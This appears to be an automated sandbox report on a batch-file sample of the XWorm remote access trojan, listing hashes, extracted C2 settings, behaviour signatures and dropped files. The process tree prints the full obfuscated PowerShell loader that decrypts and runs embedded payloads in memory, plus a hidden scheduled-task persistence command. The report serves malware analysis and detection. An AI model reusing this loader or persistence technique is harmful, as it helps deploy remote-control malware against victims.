Overview

overview

10

Static

static

1

XClient (2).bat

windows7-x64

8

XClient (2).bat

windows10-2004-x64

10

Analysis

  • max time kernel
    97s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 00:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient (2).bat

  • Size

    278KB

  • MD5

    87dfdc436f01e7015c743698464c3b8f

  • SHA1

    da351d18f1495a92396cfc1c7252e1b145b9adb2

  • SHA256

    e87acd0cba7115834705368c2f03b629261bbc80519dc5e65c4395f992b129bc

  • SHA512

    751bec2933262568a60c32c3781083b1a087e9f750a2e70b74a376c0cb449a674422398b56314ed8059a92a1a8f92b881fcfd88f68a6f753fd82b18bdde5d499

  • SSDEEP

    6144:KnqZeu/Xeq5Bg0g/4ZL01PA84vRlzzQbVZnPM:cKeIlgLzy8AdKVZPM

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:32758

pressure-continuous.gl.at.ply.gg:32758
Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient (2).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4716
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:1592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NFENJiNpg1h6SHOQTfTGTD/pq4odY17xKRKy73LvL3s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q/sPA+mDcRRjW9KDIkqcPw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fARel=New-Object System.IO.MemoryStream(,$param_var); $qyAQz=New-Object System.IO.MemoryStream; $UsAXh=New-Object System.IO.Compression.GZipStream($fARel, [IO.Compression.CompressionMode]::Decompress); $UsAXh.CopyTo($qyAQz); $UsAXh.Dispose(); $fARel.Dispose(); $qyAQz.Dispose(); $qyAQz.ToArray();}function execute_function($param_var,$param2_var){ $Ypvdz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ivVjP=$Ypvdz.EntryPoint; $ivVjP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient (2).bat';$wKWxC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient (2).bat').Split([Environment]::NewLine);foreach ($whcSy in $wKWxC) { if ($whcSy.StartsWith(':: ')) { $smtAH=$whcSy.Substring(3); break; }}$payloads_var=[string[]]$smtAH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_476_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_476.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4988
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_476.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4016
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_476.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3308
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:2372
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NFENJiNpg1h6SHOQTfTGTD/pq4odY17xKRKy73LvL3s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q/sPA+mDcRRjW9KDIkqcPw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fARel=New-Object System.IO.MemoryStream(,$param_var); $qyAQz=New-Object System.IO.MemoryStream; $UsAXh=New-Object System.IO.Compression.GZipStream($fARel, [IO.Compression.CompressionMode]::Decompress); $UsAXh.CopyTo($qyAQz); $UsAXh.Dispose(); $fARel.Dispose(); $qyAQz.Dispose(); $qyAQz.ToArray();}function execute_function($param_var,$param2_var){ $Ypvdz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ivVjP=$Ypvdz.EntryPoint; $ivVjP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_476.bat';$wKWxC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_476.bat').Split([Environment]::NewLine);foreach ($whcSy in $wKWxC) { if ($whcSy.StartsWith(':: ')) { $smtAH=$whcSy.Substring(3); break; }}$payloads_var=[string[]]$smtAH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2580

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        f8d49a4af7a844bfc7247d5670def557

        SHA1

        26ae0ce194a77a7a1887cf93741293fdfa6c94c4

        SHA256

        61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

        SHA512

        9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olhtytyh.o5k.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_476.bat
        Filesize

        278KB

        MD5

        87dfdc436f01e7015c743698464c3b8f

        SHA1

        da351d18f1495a92396cfc1c7252e1b145b9adb2

        SHA256

        e87acd0cba7115834705368c2f03b629261bbc80519dc5e65c4395f992b129bc

        SHA512

        751bec2933262568a60c32c3781083b1a087e9f750a2e70b74a376c0cb449a674422398b56314ed8059a92a1a8f92b881fcfd88f68a6f753fd82b18bdde5d499

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_476.vbs
        Filesize

        115B

        MD5

        86722163faccab24931ccf4edac53f1e

        SHA1

        f5d2754468b5abb0fcdeba18a9ee0760b2bf8f39

        SHA256

        616b6d73324d3bc1a1f0147f2381b7c75dfa8868f6ee8da518dbece692420991

        SHA512

        6267133dd0d085613222fa6c225761077117adf0a61978580111d219397b8e35c9f9b6971e33da7e67bf023bd080b2ca80bcdbdfbfa74c52789b31bd9e7aede4

        Download Submit

      • memory/2580-49-0x0000022CDC070000-0x0000022CDC084000-memory.dmp

        Filesize

        80KB

        Download

      • memory/3992-12-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3992-14-0x000001EAE9450000-0x000001EAE9486000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3992-13-0x000001EACEEF0000-0x000001EACEEF8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3992-0-0x00007FFC5D233000-0x00007FFC5D235000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3992-11-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3992-7-0x000001EAE9200000-0x000001EAE9222000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3992-50-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4988-16-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4988-17-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4988-27-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4988-30-0x00007FFC5D230000-0x00007FFC5DCF1000-memory.dmp

        Filesize

        10.8MB

        Download